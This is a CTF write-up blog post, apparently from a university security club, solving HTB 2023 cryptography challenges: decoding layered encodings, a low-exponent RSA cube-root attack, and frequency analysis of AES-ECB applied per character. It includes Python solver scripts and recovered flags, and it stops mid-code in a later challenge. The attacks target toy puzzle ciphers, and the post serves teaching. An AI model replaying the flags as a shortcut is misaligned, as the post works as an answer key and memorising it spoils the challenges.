https://bkisc-blog.netlify.app/author/onirique/OniriqueWowchemy (https://wowchemy.com)en-ushttps://bkisc-blog.netlify.app/author/onirique/avatar_hu8c6b91a6c2eae83f406a44092e6d577f_254439_270x270_fill_lanczos_center_3.pnghttps://bkisc-blog.netlify.app/author/onirique/https://bkisc-blog.netlify.app/blog/bkisc/htb2023-crypto/Mon, 27 Mar 2023 00:00:00 +0000https://bkisc-blog.netlify.app/blog/bkisc/htb2023-crypto/<p> <ul class="tags-list"> <a href="https://bkisc-blog.netlify.app/tag/ctf/">ctf</a> <a href="https://bkisc-blog.netlify.app/tag/writeup/">writeup</a> <a href="https://bkisc-blog.netlify.app/tag/crypto/">crypto</a> <a href="https://bkisc-blog.netlify.app/tag/htb-2023/">htb-2023</a> </ul> <details class="toc-inpage d-print-none " open> <summary class="font-weight-bold">Table of Contents</summary> <nav id="TableOfContents"> <ul> <li><a href="#ancient-encodings">Ancient Encodings</a></li> <li><a href="#small-steps">Small StEps</a></li> <li><a href="#perfect-synchronization">Perfect Synchronization</a> <ul> <li><a href="#problem-statement">Problem statement</a></li> <li><a href="#initial-analysis">Initial Analysis</a></li> <li><a href="#solution-method">Solution method</a></li> <li><a href="#results">Results</a></li> <li><a href="#conclusion-1">Conclusion</a></li> </ul> </li> <li><a href="#multipage-recyclings">Multipage Recyclings</a> <ul> <li><a href="#problem-statement-1">Problem Statement</a></li> <li><a href="#initial-analysis-1">Initial Analysis</a></li> <li><a href="#solution-method-1">Solution Method</a></li> <li><a href="#results-1">Results</a></li> </ul> </li> <li><a href="#inside-the-matrix">Inside the Matrix</a> <ul> <li><a href="#problem-statement-2">Problem Statement</a></li> <li><a href="#initial-analysis-2">Initial Analysis</a></li> <li><a href="#solution-method-2">Solution Method</a></li> <li><a href="#results-2">Results</a></li> </ul> </li> <li><a href="#colliding-heritage">Colliding Heritage</a> <ul> <li><a href="#initial-analysis-3">Initial Analysis</a></li> <li><a href="#solution">Solution</a></li> </ul> </li> <li><a href="#elliptic-labyrinth">Elliptic Labyrinth</a> <ul> <li><a href="#problem-statement-3">Problem Statement</a></li> <li><a href="#initial-analysis-4">Initial analysis</a></li> <li><a href="#solution-method-3">Solution Method</a></li> <li><a href="#results-3">Results</a></li> </ul> </li> <li><a href="#elliptic-labyrinth-revenge">Elliptic Labyrinth Revenge</a> <ul> <li><a href="#problem-statement-4">Problem Statement</a></li> <li><a href="#initial-analysis-5">Initial Analysis</a></li> <li><a href="#implementation-and-results">Implementation and Results</a></li> </ul> </li> <li><a href="#biased-heritage">Biased Heritage</a></li> <li><a href="#converging-visions">Converging Visions</a></li> <li><a href="#blokechain">Blokechain</a></li> <li><a href="#original-post">Original Post</a></li> </ul> </nav> </details> </p> <h2 id="ancient-encodings">Ancient Encodings</h2> <ul> <li> <p><strong>Given file:</strong> <a href="https://drive.google.com/file/d/1eDi7M0cVA9-y2EPYMWehni7YQpq-3QN4/view?usp=sharing" target="_blank" rel="noopener">Get it here!</a></p> </li> <li> <p><strong>Description:</strong> Your initialization sequence requires loading various programs to gain the necessary knowledge and skills for your journey. Your first task is to learn the ancient encodings used by the aliens in their communication.</p> </li> <li> <p><strong>Category:</strong> Cryptography</p> </li> <li> <p><strong>Difficulty:</strong> Very Easy</p> </li> </ul> <p>We are given a Python script and a text file. Analyze the script, we get to know how the string is being encoded, which is <code>Base 64 encode &gt; Conversion to long from bytes &gt; Hex</code>.</p> <p>To get the original string, we simply reverse the process, using <a href="https://gchq.github.io/CyberChef" target="_blank" rel="noopener">CyberChef</a> with the hex given in the text file.</p> <img src="crypto1.png" alt="linux" width="1000"/> <p>Flag is: <strong>HTB{1n_y0ur_j0urn3y_y0u_wi1l_se3_th15_enc0d1ngs_ev3rywher3}</strong></p> <h2 id="small-steps">Small StEps</h2> <ul> <li> <p><strong>Given file:</strong> <a href="https://drive.google.com/file/d/1UWVtdIr8GX9C6to-uuyEJe0v3Zg_baDf/view?usp=sharing" target="_blank" rel="noopener">Get it here!</a></p> </li> <li> <p><strong>Description:</strong> As you continue your journey, you must learn about the encryption method the aliens used to secure their communication from eavesdroppers. The engineering team has designed a challenge that emulates the exact parameters of the aliens&rsquo; encryption system, complete with instructions and a code snippet to connect to a mock alien server. Your task is to break it.</p> </li> <li> <p><strong>Note:</strong> This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.</p> </li> <li> <p><strong>Category:</strong> Cryptography</p> </li> <li> <p><strong>Difficulty:</strong> Very Easy</p> </li> </ul> <p>We are given two Python script. The server.py is to setup a server for <code>RSA encryption</code>. It will output <code>n, e, ct</code> upon connecting to the netcat server/run the Python script locally.</p> <img src="crypto2.png" alt="linux" width="1000"/> <p>Since <code>e</code> is always <code>3</code>, we can use <a href="https://crypto.stackexchange.com/questions/6713/low-public-exponent-attack-for-rsa" target="_blank" rel="noopener">Low public exponent RSA attack</a> to recover the initial message. In general, we only have to calculate <code>cube root</code> of ciphertext to get the plaintext.</p> <p>Below is the implementation of the attack in Python.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">Crypto.Util.number</span> <span class="kn">import</span> <span class="n">long_to_bytes</span> </span></span><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">gmpy2</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">n</span> <span class="o">=</span> <span class="mi">884883504927573976507811885368533220992278181011115684591381528075201937106582650631361008463165895850991665645858432026935373136174833729634068491453157</span> </span></span><span class="line"><span class="cl"><span class="n">e</span> <span class="o">=</span> <span class="mi">3</span> </span></span><span class="line"><span class="cl"><span class="n">ct</span> <span class="o">=</span> <span class="mi">70407336670535933819674104208890254240063781538460394662998902860952366439176467447947737680952277637330523818962104685553250402512989897886053</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">pt</span> <span class="o">=</span> <span class="n">gmpy2</span><span class="o">.</span><span class="n">iroot</span><span class="p">(</span><span class="n">ct</span><span class="p">,</span> <span class="mi">3</span><span class="p">)[</span><span class="mi">0</span><span class="p">]</span> <span class="c1"># Get cube root of ct</span> </span></span><span class="line"><span class="cl"><span class="nb">print</span><span class="p">(</span><span class="n">long_to_bytes</span><span class="p">(</span><span class="n">pt</span><span class="p">))</span> </span></span></code></pre></div><p>Flag is: <strong>HTB{5ma1l_E-xp0n3nt}</strong></p> <h2 id="perfect-synchronization">Perfect Synchronization</h2> <ul> <li> <p><strong>Given file:</strong> <a href="https://drive.google.com/drive/folders/1vm-yF-YzL-l18Rf83RwPo2ar0ZjLEehg?usp=sharing" target="_blank" rel="noopener">Get it here!</a></p> </li> <li> <p><strong>Description:</strong> The final stage of your initialization sequence is mastering cutting-edge technology tools that can be life-changing. One of these tools is quipqiup, an automated tool for frequency analysis and breaking substitution ciphers. This is the ultimate challenge, simulating the use of AES encryption to protect a message. Can you break it?</p> </li> <li> <p><strong>Category:</strong> Cryptography</p> </li> <li> <p><strong>Difficulty:</strong> Easy</p> </li> </ul> <p>The encryption is shown below:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">os</span> <span class="kn">import</span> <span class="n">urandom</span> </span></span><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">Crypto.Cipher</span> <span class="kn">import</span> <span class="n">AES</span> </span></span><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">secret</span> <span class="kn">import</span> <span class="n">MESSAGE</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">assert</span> <span class="nb">all</span><span class="p">([</span><span class="n">x</span><span class="o">.</span><span class="n">isupper</span><span class="p">()</span> <span class="ow">or</span> <span class="n">x</span> <span class="ow">in</span> <span class="s1">&#39;</span><span class="si">{_}</span><span class="s1"> &#39;</span> <span class="k">for</span> <span class="n">x</span> <span class="ow">in</span> <span class="n">MESSAGE</span><span class="p">])</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">class</span> <span class="nc">Cipher</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">def</span> <span class="fm">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="bp">self</span><span class="o">.</span><span class="n">salt</span> <span class="o">=</span> <span class="n">urandom</span><span class="p">(</span><span class="mi">15</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">key</span> <span class="o">=</span> <span class="n">urandom</span><span class="p">(</span><span class="mi">16</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="bp">self</span><span class="o">.</span><span class="n">cipher</span> <span class="o">=</span> <span class="n">AES</span><span class="o">.</span><span class="n">new</span><span class="p">(</span><span class="n">key</span><span class="p">,</span> <span class="n">AES</span><span class="o">.</span><span class="n">MODE_ECB</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">def</span> <span class="nf">encrypt</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">message</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="p">[</span><span class="bp">self</span><span class="o">.</span><span class="n">cipher</span><span class="o">.</span><span class="n">encrypt</span><span class="p">(</span><span class="n">c</span><span class="o">.</span><span class="n">encode</span><span class="p">()</span> <span class="o">+</span> <span class="bp">self</span><span class="o">.</span><span class="n">salt</span><span class="p">)</span> <span class="k">for</span> <span class="n">c</span> <span class="ow">in</span> <span class="n">message</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">main</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="n">cipher</span> <span class="o">=</span> <span class="n">Cipher</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="n">encrypted</span> <span class="o">=</span> <span class="n">cipher</span><span class="o">.</span><span class="n">encrypt</span><span class="p">(</span><span class="n">MESSAGE</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">encrypted</span> <span class="o">=</span> <span class="s2">&#34;</span><span class="se">\n</span><span class="s2">&#34;</span><span class="o">.</span><span class="n">join</span><span class="p">([</span><span class="n">c</span><span class="o">.</span><span class="n">hex</span><span class="p">()</span> <span class="k">for</span> <span class="n">c</span> <span class="ow">in</span> <span class="n">encrypted</span><span class="p">])</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s2">&#34;output.txt&#34;</span><span class="p">,</span> <span class="s1">&#39;w+&#39;</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">f</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">encrypted</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s2">&#34;__main__&#34;</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">main</span><span class="p">()</span> </span></span></code></pre></div><h3 id="problem-statement">Problem statement</h3> <p>The Python script defines a <code>Cipher</code> class that generates a random salt and key, then encrypts a message using AES in ECB mode. The encrypted message is written to a file in hexadecimal format. The <code>MESSAGE</code> variable is imported from a separate file. Our mission is to recover the encrypted message and find the flag in it.</p> <h3 id="initial-analysis">Initial Analysis</h3> <h4 id="the-randomness">The randomness</h4> <p>The author adds some randomnesses including <code>key</code> and <code>salt</code> to make the encryption more unpredictable. But if you look more closely into it, you will realize that the <code>salt</code> is just initialized once, and be padded for all characters in the message. It means the <code>salt</code> is not too much useful, it just shifts all characters by a constant value.</p> <h4 id="the-aes-encryption-mode">The AES encryption mode</h4> <p>The author uses EBC mode - the weakest mode, to encrypt all <code>shifted</code> characters of the message.</p> <p>For anyone who doesn&rsquo;t know about <code>ECB</code>: <code>ECB (Electronic Codebook)</code> is one of the simplest modes of <code>AES encryption</code>, where each block of plaintext is encrypted separately using the same key.</p> <p>In this mode, identical plaintext blocks will be encrypted to identical ciphertext blocks, making it vulnerable to attacks that exploit patterns in the plaintext. Therefore, ECB mode is not recommended for secure communication, and other modes like CBC, CTR, or GCM are preferred. A visualized example is illustrated in <a href="https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation" target="_blank" rel="noopener">this wiki</a> to show that AES-ECB mode is not semantically secure.</p> <h4 id="conclusion">Conclusion</h4> <p>By the above analysis, we can prove that:</p> <p>For every $c_A, c_B \in \text{message}$: $c_A = c_B \Leftrightarrow ECB(c_A + \text{salt}) = ECB(c_B + \text{salt})$</p> <p>This means the encryption is just a substitution cipher.</p> <h3 id="solution-method">Solution method</h3> <p>For simplicity in frequency analyzing, I map every different hex strings in the output file to a character (A-Z, 1-4), noted that identical strings would produce identical characters. By comparing to English Letter Frequency (including space character) table, we may recover some common letters like e, t, i, a, o confidentally. Then, by the reduncancy and meaning of English words, I can recover the entire content and find the flag.</p> <h3 id="results">Results</h3> <p>After the mapping, here is the encrypted message:</p> <p><code>ABCDECFGHIJFJKHLMLIMLINJLCOIPFIQRCIAJGQIQRJQIMFIJFHISMTCFILQBCQGRIPAIVBMQQCFIKJFSEJSCIGCBQJMFIKCQQCBLIJFOIGPUNMFJQMPFLIPAIKCQQCBLIPGGEBIVMQRITJBHMFSIABCDECFGMCLIUPBCPTCBIQRCBCIMLIJIGRJBJGQCBMLQMGIOMLQBMNEQMPFIPAIKCQQCBLIQRJQIMLIBPESRKHIQRCILJUCIAPBIJKUPLQIJKKILJUWKCLIPAIQRJQIKJFSEJSCIMFIGBHWQJFJKHLMLIABCDECFGHIJFJKHLMLIJKLPIXFPVFIJLIGPEFQMFSIKCQQCBLIMLIQRCILQEOHIPAIQRCIABCDECFGHIPAIKCQQCBLIPBISBPEWLIPAIKCQQCBLIMFIJIGMWRCBQCYQIQRCIUCQRPOIMLIELCOIJLIJFIJMOIQPINBCJXMFSIGKJLLMGJKIGMWRCBLIABCDECFGHIJFJKHLMLIBCDEMBCLIPFKHIJINJLMGIEFOCBLQJFOMFSIPAIQRCILQJQMLQMGLIPAIQRCIWKJMFQCYQIKJFSEJSCIJFOILPUCIWBPNKCUILPKTMFSILXMKKLIJFOIMAIWCBAPBUCOINHIRJFOIQPKCBJFGCIAPBICYQCFLMTCIKCQQCBINPPXXCCWMFSIOEBMFSIVPBKOIVJBIMMINPQRIQRCINBMQMLRIJFOIQRCIJUCBMGJFLIBCGBEMQCOIGPOCNBCJXCBLINHIWKJGMFSIGBPLLVPBOIWEZZKCLIMFIUJ1PBIFCVLWJWCBLIJFOIBEFFMFSIGPFQCLQLIAPBIVRPIGPEKOILPKTCIQRCUIQRCIAJLQCLQILCTCBJKIPAIQRCIGMWRCBLIELCOINHIQRCIJYMLIWPVCBLIVCBCINBCJXJNKCIELMFSIABCDECFGHIJFJKHLMLIAPBICYJUWKCILPUCIPAIQRCIGPFLEKJBIGMWRCBLIELCOINHIQRCI1JWJFCLCIUCGRJFMGJKIUCQRPOLIPAIKCQQCBIGPEFQMFSIJFOILQJQMLQMGJKIJFJKHLMLISCFCBJKKHIRQN2J3LMUWKC3LENLQMQEQMPF3ML3VCJX4IGJBOIQHWCIUJGRMFCBHIVCBCIAMBLQIELCOIMFIVPBKOIVJBIMMIWPLLMNKHINHIQRCIELIJBUHLILMLIQPOJHIQRCIRJBOIVPBXIPAIKCQQCBIGPEFQMFSIJFOIJFJKHLMLIRJLINCCFIBCWKJGCOINHIGPUWEQCBILPAQVJBCIVRMGRIGJFIGJBBHIPEQILEGRIJFJKHLMLIMFILCGPFOLIVMQRIUPOCBFIGPUWEQMFSIWPVCBIGKJLLMGJKIGMWRCBLIJBCIEFKMXCKHIQPIWBPTMOCIJFHIBCJKIWBPQCGQMPFIAPBIGPFAMOCFQMJKIOJQJIWEZZKCIWEZZKCIWEZZKC</code></p> <p>Plotting the histogram of this encrypted message, comparing with the expected frequency, we get:</p> <img src='histogram.png' alt="Histogram" width="1000"/> <p>Here is the script, if you&rsquo;re interested in:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">matplotlib.pyplot</span> <span class="k">as</span> <span class="nn">plt</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">plot_histogram</span><span class="p">(</span><span class="n">text</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">english_freq</span> <span class="o">=</span> <span class="p">{</span><span class="s1">&#39;space&#39;</span><span class="p">:</span> <span class="mf">0.18316895740067898</span><span class="p">,</span> <span class="s1">&#39;e&#39;</span><span class="p">:</span> <span class="mf">0.10266650309881365</span><span class="p">,</span> <span class="s1">&#39;t&#39;</span><span class="p">:</span> <span class="mf">0.07516918822929543</span><span class="p">,</span> <span class="s1">&#39;a&#39;</span><span class="p">:</span> <span class="mf">0.0653211522431101</span><span class="p">,</span> <span class="s1">&#39;o&#39;</span><span class="p">:</span> <span class="mf">0.06165021261170107</span><span class="p">,</span> <span class="s1">&#39;i&#39;</span><span class="p">:</span> <span class="mf">0.06109938076429621</span><span class="p">,</span> <span class="s1">&#39;n&#39;</span><span class="p">:</span> <span class="mf">0.05748993391266301</span><span class="p">,</span> <span class="s1">&#39;s&#39;</span><span class="p">:</span> <span class="mf">0.0558094607431706</span><span class="p">,</span> <span class="s1">&#39;r&#39;</span><span class="p">:</span> <span class="mf">0.05501226388301501</span><span class="p">,</span> <span class="s1">&#39;h&#39;</span><span class="p">:</span> <span class="mf">0.0418265243918537</span><span class="p">,</span> <span class="s1">&#39;l&#39;</span><span class="p">:</span> <span class="mf">0.03203162615518401</span><span class="p">,</span> <span class="s1">&#39;d&#39;</span><span class="p">:</span> <span class="mf">0.03123691335535358</span><span class="p">,</span> <span class="s1">&#39;u&#39;</span><span class="p">:</span> <span class="mf">0.02074798285524714</span><span class="p">,</span> <span class="s1">&#39;c&#39;</span><span class="p">:</span> <span class="mf">0.020576050425919314</span><span class="p">,</span> <span class="s1">&#39;m&#39;</span><span class="p">:</span> <span class="mf">0.019830666456506605</span><span class="p">,</span> <span class="s1">&#39;f&#39;</span><span class="p">:</span> <span class="mf">0.016535714836861396</span><span class="p">,</span> <span class="s1">&#39;w&#39;</span><span class="p">:</span> <span class="mf">0.015818636195592536</span><span class="p">,</span> <span class="s1">&#39;g&#39;</span><span class="p">:</span> <span class="mf">0.014126275726274115</span><span class="p">,</span> <span class="s1">&#39;p&#39;</span><span class="p">:</span> <span class="mf">0.01318902368984632</span><span class="p">,</span> <span class="s1">&#39;y&#39;</span><span class="p">:</span> <span class="mf">0.012614330285168858</span><span class="p">,</span> <span class="s1">&#39;b&#39;</span><span class="p">:</span> <span class="mf">0.010748157780246267</span><span class="p">,</span> <span class="s1">&#39;v&#39;</span><span class="p">:</span> <span class="mf">0.007961080746834234</span><span class="p">,</span> <span class="s1">&#39;k&#39;</span><span class="p">:</span> <span class="mf">0.005609987561400249</span><span class="p">,</span> <span class="s1">&#39;x&#39;</span><span class="p">:</span> <span class="mf">0.0012367402118007968</span><span class="p">,</span> <span class="s1">&#39;j&#39;</span><span class="p">:</span> <span class="mf">0.0010975645567653538</span><span class="p">,</span> <span class="s1">&#39;q&#39;</span><span class="p">:</span> <span class="mf">0.0010065039671926798</span><span class="p">,</span> <span class="s1">&#39;z&#39;</span><span class="p">:</span> <span class="mf">0.0005273232293542625</span><span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="n">char_dict</span> <span class="o">=</span> <span class="p">{}</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="n">char</span> <span class="ow">in</span> <span class="n">text</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="n">char</span> <span class="ow">in</span> <span class="n">char_dict</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">char_dict</span><span class="p">[</span><span class="n">char</span><span class="p">]</span> <span class="o">+=</span> <span class="mi">1</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">char_dict</span><span class="p">[</span><span class="n">char</span><span class="p">]</span> <span class="o">=</span> <span class="mi">1</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="n">key</span> <span class="ow">in</span> <span class="n">char_dict</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">char_dict</span><span class="p">[</span><span class="n">key</span><span class="p">]</span> <span class="o">/=</span> <span class="nb">len</span><span class="p">(</span><span class="n">text</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="c1"># char_dict[key] *= 100</span> </span></span><span class="line"><span class="cl"> <span class="n">char_dict</span> <span class="o">=</span> <span class="nb">dict</span><span class="p">(</span><span class="nb">sorted</span><span class="p">(</span><span class="n">char_dict</span><span class="o">.</span><span class="n">items</span><span class="p">(),</span> <span class="n">key</span><span class="o">=</span><span class="k">lambda</span> <span class="n">x</span><span class="p">:</span> <span class="n">x</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="n">reverse</span><span class="o">=</span><span class="kc">True</span><span class="p">))</span> </span></span><span class="line"><span class="cl"> <span class="c1"># plt.bar(char_dict.keys(), char_dict.values())</span> </span></span><span class="line"><span class="cl"> <span class="n">fig</span><span class="p">,</span> <span class="p">(</span><span class="n">ax1</span><span class="p">,</span> <span class="n">ax2</span><span class="p">)</span> <span class="o">=</span> <span class="n">plt</span><span class="o">.</span><span class="n">subplots</span><span class="p">(</span><span class="n">nrows</span><span class="o">=</span><span class="mi">2</span><span class="p">,</span> <span class="n">ncols</span><span class="o">=</span><span class="mi">1</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="c1"># Plot the first subplot</span> </span></span><span class="line"><span class="cl"> <span class="n">ax1</span><span class="o">.</span><span class="n">bar</span><span class="p">(</span><span class="n">char_dict</span><span class="o">.</span><span class="n">keys</span><span class="p">(),</span> <span class="n">char_dict</span><span class="o">.</span><span class="n">values</span><span class="p">())</span> </span></span><span class="line"><span class="cl"> <span class="n">ax1</span><span class="o">.</span><span class="n">set_xlabel</span><span class="p">(</span><span class="s1">&#39;Encrypted message&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">ax1</span><span class="o">.</span><span class="n">set_ylabel</span><span class="p">(</span><span class="s1">&#39;Frequency (%)&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="c1"># Plot the second subplot</span> </span></span><span class="line"><span class="cl"> <span class="n">ax2</span><span class="o">.</span><span class="n">bar</span><span class="p">(</span><span class="n">english_freq</span><span class="o">.</span><span class="n">keys</span><span class="p">(),</span> <span class="n">english_freq</span><span class="o">.</span><span class="n">values</span><span class="p">())</span> </span></span><span class="line"><span class="cl"> <span class="n">ax2</span><span class="o">.</span><span class="n">set_xlabel</span><span class="p">(</span><span class="s1">&#39;English&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">ax2</span><span class="o">.</span><span class="n">set_ylabel</span><span class="p">(</span><span class="s1">&#39;Frequency (%)&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">plt</span><span class="o">.</span><span class="n">show</span><span class="p">()</span> </span></span></code></pre></div><p>Based on the charts, we can easily find that letter <code>I</code>, <code>C</code> in encrypted message must be <code>space</code> and <code>e</code> in English, respectively. I guess there must be one and only one pair <code>{}</code> in the message for the flag <code>HTB{...}</code>. In the above chart, letter <code>2</code> and <code>4</code> share the smallest frequency, so they must be <code>{</code> and <code>}</code>. Moreover, the 3 characters immediately preceding <code>{</code> must be <code>htb</code>. After that, we got:</p> <p><code>ABeDEeFGH JFJKHLML ML bJLeO PF the AJGt thJt MF JFH SMTeF LtBetGh PA VBMtteF KJFSEJSe GeBtJMF KetteBL JFO GPUbMFJtMPFL PA KetteBL PGGEB VMth TJBHMFS ABeDEeFGMeL UPBePTeB theBe ML J GhJBJGteBMLtMG OMLtBMbEtMPF PA KetteBL thJt ML BPEShKH the LJUe APB JKUPLt JKK LJUWKeL PA thJt KJFSEJSe MF GBHWtJFJKHLML ABeDEeFGH JFJKHLML JKLP XFPVF JL GPEFtMFS KetteBL ML the LtEOH PA the ABeDEeFGH PA KetteBL PB SBPEWL PA KetteBL MF J GMWheBteYt the UethPO ML ELeO JL JF JMO tP bBeJXMFS GKJLLMGJK GMWheBL ABeDEeFGH JFJKHLML BeDEMBeL PFKH J bJLMG EFOeBLtJFOMFS PA the LtJtMLtMGL PA the WKJMFteYt KJFSEJSe JFO LPUe WBPbKeU LPKTMFS LXMKKL JFO MA WeBAPBUeO bH hJFO tPKeBJFGe APB eYteFLMTe KetteB bPPXXeeWMFS OEBMFS VPBKO VJB MM bPth the bBMtMLh JFO the JUeBMGJFL BeGBEMteO GPOebBeJXeBL bH WKJGMFS GBPLLVPBO WEZZKeL MF UJ1PB FeVLWJWeBL JFO BEFFMFS GPFteLtL APB VhP GPEKO LPKTe theU the AJLteLt LeTeBJK PA the GMWheBL ELeO bH the JYML WPVeBL VeBe bBeJXJbKe ELMFS ABeDEeFGH JFJKHLML APB eYJUWKe LPUe PA the GPFLEKJB GMWheBL ELeO bH the 1JWJFeLe UeGhJFMGJK UethPOL PA KetteB GPEFtMFS JFO LtJtMLtMGJK JFJKHLML SeFeBJKKH htb{J3LMUWKe3LEbLtMtEtMPF3ML3VeJX} GJBO tHWe UJGhMFeBH VeBe AMBLt ELeO MF VPBKO VJB MM WPLLMbKH bH the EL JBUHL LML tPOJH the hJBO VPBX PA KetteB GPEFtMFS JFO JFJKHLML hJL beeF BeWKJGeO bH GPUWEteB LPAtVJBe VhMGh GJF GJBBH PEt LEGh JFJKHLML MF LeGPFOL VMth UPOeBF GPUWEtMFS WPVeB GKJLLMGJK GMWheBL JBe EFKMXeKH tP WBPTMOe JFH BeJK WBPteGtMPF APB GPFAMOeFtMJK OJtJ WEZZKe WEZZKe WEZZKe</code></p> <p>The remaining task is to guess the words based on their meanings. Here is the result:</p> <p><code>frequency analysis is based on the fact that in any giTen stretch of written language certain letters and combinations of letters occur with Tarying frequencies moreoTer there is a characteristic distribution of letters that is roughly the same for almost all samples of that language in cryptanalysis frequency analysis also tnown as counting letters is the study of the frequency of letters or groups of letters in a cipherteYt the method is used as an aid to breating classical ciphers frequency analysis requires only a basic understanding of the statistics of the plainteYt language and some problem solTing stills and if performed by hand tolerance for eYtensiTe letter bootteeping during world war ii both the british and the americans recruited codebreaters by placing crossword puZZles in ma1or newspapers and running contests for who could solTe them the fastest seTeral of the ciphers used by the aYis powers were breatable using frequency analysis for eYample some of the consular ciphers used by the 1apanese mechanical methods of letter counting and statistical analysis generally htb{a_simple_substitution_is_weat} card type machinery were first used in world war ii possibly by the us armys sis today the hard wort of letter counting and analysis has been replaced by computer software which can carry out such analysis in seconds with modern computing power classical ciphers are unlitely to proTide any real protection for confidential data puZZle puZZle puZZle</code></p> <p>Flag is: <strong>HTB{a_simple_substitution_is_weat}</strong></p> <h3 id="conclusion-1">Conclusion</h3> <p>This challenge is just a substitution cipher, which is totally insecure against frequency analysis. The <code>random key</code>, <code>salt</code>, <code>AES-ECB</code> is just to make colors :D.</p> <h2 id="multipage-recyclings">Multipage Recyclings</h2> <ul> <li> <p><strong>Given file:</strong> <a href="https://drive.google.com/file/d/1w-n16tVbL_eG-8XOvoMPJcfAEWQwxq-5/view?usp=sharing" target="_blank" rel="noopener">Get it here!</a></p> </li> <li> <p><strong>Description:</strong> As your investigation progressed, a clue led you to a local bar where you met an undercover agent with valuable information. He spoke of a famous astronomy scientist who lived in the area and extensively studied the relic. The scientist wrote a book containing valuable insights on the relic&rsquo;s location, but encrypted it before he disappeared to keep it safe from malicious intent. The old man disclosed that the book was hidden in the scientist&rsquo;s house and revealed two phrases that the scientist rambled about before vanishing.</p> </li> <li> <p><strong>Category:</strong> Cryptography</p> </li> <li> <p><strong>Difficulty:</strong> Easy</p> </li> </ul> <p>The server script is shown below:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">Crypto.Cipher</span> <span class="kn">import</span> <span class="n">AES</span> </span></span><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">Crypto.Util.Padding</span> <span class="kn">import</span> <span class="n">pad</span> </span></span><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">random</span><span class="o">,</span> <span class="nn">os</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">FLAG</span> <span class="o">=</span> <span class="sa">b</span><span class="s1">&#39;HTB{??????????????????????}&#39;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">class</span> <span class="nc">CAES</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">def</span> <span class="fm">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="bp">self</span><span class="o">.</span><span class="n">key</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">urandom</span><span class="p">(</span><span class="mi">16</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="bp">self</span><span class="o">.</span><span class="n">cipher</span> <span class="o">=</span> <span class="n">AES</span><span class="o">.</span><span class="n">new</span><span class="p">(</span><span 